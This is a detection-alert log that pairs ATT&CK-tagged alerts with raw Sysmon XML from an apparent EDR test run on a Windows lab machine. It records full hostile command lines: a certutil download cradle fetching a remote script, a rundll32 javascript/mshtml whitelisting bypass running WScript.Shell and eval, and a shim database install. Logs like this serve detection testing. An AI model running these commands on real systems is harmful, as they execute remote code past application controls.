<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:21.867545Z"">
</TimeCreated>
<EventRecordID>4982</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.735</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49833</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:21.867100Z"">
</TimeCreated>
<EventRecordID>4981</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.619</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49832</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:20.459065Z"">
</TimeCreated>
<EventRecordID>4980</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.410</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
<Data Name=""ParentProcessId"">7088</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:20.459065Z"">
</TimeCreated>
<EventRecordID>4980</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.410</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010E37B8D00</Data>
<Data Name=""ProcessId"">4520</Data>
<Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">CertUtil.exe</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
<Data Name=""ParentProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
<Data Name=""ParentProcessId"">7088</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:20.238305Z"">
</TimeCreated>
<EventRecordID>4978</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:20.134</Data>
<Data Name=""ProcessGuid"">747F3D96-665C-5D3F-0000-0010096B8D00</Data>
<Data Name=""ProcessId"">7088</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);})",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
</TimeCreated>
<EventRecordID>4977</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ParentProcessId"">1808</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
</TimeCreated>
<EventRecordID>4977</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ParentProcessId"">1808</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.658168Z"">
</TimeCreated>
<EventRecordID>4977</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.502</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001011298D00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ParentProcessId"">1808</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:58:20.994444Z"">
</TimeCreated>
<EventRecordID>1966480</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:58:20.894</Data>
<Data Name=""ProcessGuid"">365ABB72-57EC-5C91-0000-001097810900</Data>
<Data Name=""ProcessId"">2848</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Users\user01\Desktop\titi.sdb&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\user01\Desktop\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new0ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;calc.exe&quot;,0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe &amp;&amp; exit&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:34:15.226408Z"">
</TimeCreated>
<EventRecordID>4975</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:34:15.202</Data>
<Data Name=""ProcessGuid"">747F3D96-6657-5D3F-0000-001029198D00</Data>
<Data Name=""ProcessId"">1808</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
